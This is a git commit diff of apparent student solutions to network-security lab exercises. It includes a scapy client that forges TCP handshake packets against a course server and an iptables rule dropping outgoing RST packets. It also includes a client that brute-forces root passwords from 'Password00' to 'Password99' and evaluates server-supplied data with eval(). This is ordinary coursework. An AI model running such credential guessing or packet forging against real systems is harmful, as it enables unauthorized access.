upated bash

solved and updated with enumeration
2024-11-10 18:50:30 +09:00 · 2024-11-09 23:02:43 +09:00
3 changed files with 17 additions and 12 deletions
--- a/week02/easy/client.py
+++ b/week02/easy/client.py
@ -14,8 +14,8 @@ from random import randrange
 log = logging.getLogger(__name__)
 TCP_CLIENTS = {}  # ((IP, port) -> [sent_packets])

-# SERVER_IP = '131.159.15.68' # don't use the domain name in this case
-SERVER_IP = '192.168.1.4' # don't use the domain name in this case
+SERVER_IP = '131.159.15.68' # don't use the domain name in this case
+# SERVER_IP = '192.168.1.4' # don't use the domain name in this case
 SERVER_PORT = 20102
 COOKIE_SECRET = 'TASTY_COOKIES123'
 INITIAL_SEQ = 1337
@ -27,12 +27,18 @@ def generate_syn_cookie(client_ip: str, client_port: int, server_secret: str):

 def handle_packet(packet: Packet):
    # TODO: please implement me!
+    packet.show()
    if packet.haslayer(TCP) and packet[TCP].sport == SERVER_PORT and packet[TCP].dport == SRC_PORT and packet[TCP].flags == "SA":
+        print("received SA packett")
        ip = IP(dst=SERVER_IP)
        syn = TCP(sport=SRC_PORT, dport=SERVER_PORT, flags='SA', seq=COOKIE, ack=packet[TCP].seq)
        resp = (ip / syn)
        send(resp)
-    packet.show()
+    if packet.haslayer(TCP) and packet[TCP].sport == SERVER_PORT and packet[TCP].dport == SRC_PORT and packet[TCP].flags == "A":
+        print("received acknowledgement")
+        payload = bytes(packet[TCP].payload).decode(errors='ignore')
+        print("Extracted flag:", payload)  # This should print "hello world"
+

 # Function to start the packet sniffing
 def start_sniffing():    
--- a/week02/easy/stop_autot_reset.sh
+++ b/week02/easy/stop_autot_reset.sh
@ -0,0 +1 @@
+sudo iptables-legacy -A OUTPUT -p tcp -d 131.159.15.68 --tcp-flags RST RST -j DROP
--- a/week02/hard/client.py
+++ b/week02/hard/client.py
@ -6,27 +6,25 @@ PORT = 64984  # TODO

 def get_flag():
    for i in range(100):
-        time.sleep(2)
        credentials  = "root,Password"+str("%02d" % i)
-        print(credentials)
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            sf = s.makefile('rw')  # we use a file abstraction for the sockets
-            print(sf.readline().rstrip('\n'))
+            tmp = sf.readline().rstrip('\n')
            sf.write("{}\n".format(credentials))
            sf.flush()
            data  = sf.readline().rstrip('\n')
            resp = eval(data)
            sf.write("{}\n".format(resp))
            sf.flush()
-            result = sf.readline().rstrip('\n')
-            if "login" in result:
-                print(sf.readline().rstrip('\n'))
-                break
+            ans = sf.readline().rstrip('\n')
+            if "login" in ans:
+                res = sf.readline().rstrip('\n')
+                return res
        except:
            pass
-            
+    

 if __name__ == '__main__':
-    get_flag()
+    print(get_flag())
Author	SHA1	Message	Date
Dongho Kim	ca0fd21d73	upated bash	2024-11-10 18:50:30 +09:00
Dongho Kim	7f126ce5f8	solved and updated with enumeration	2024-11-09 23:02:43 +09:00
				`@ -0,0 +1 @@`
				`sudo iptables-legacy -A OUTPUT -p tcp -d 131.159.15.68 --tcp-flags RST RST -j DROP`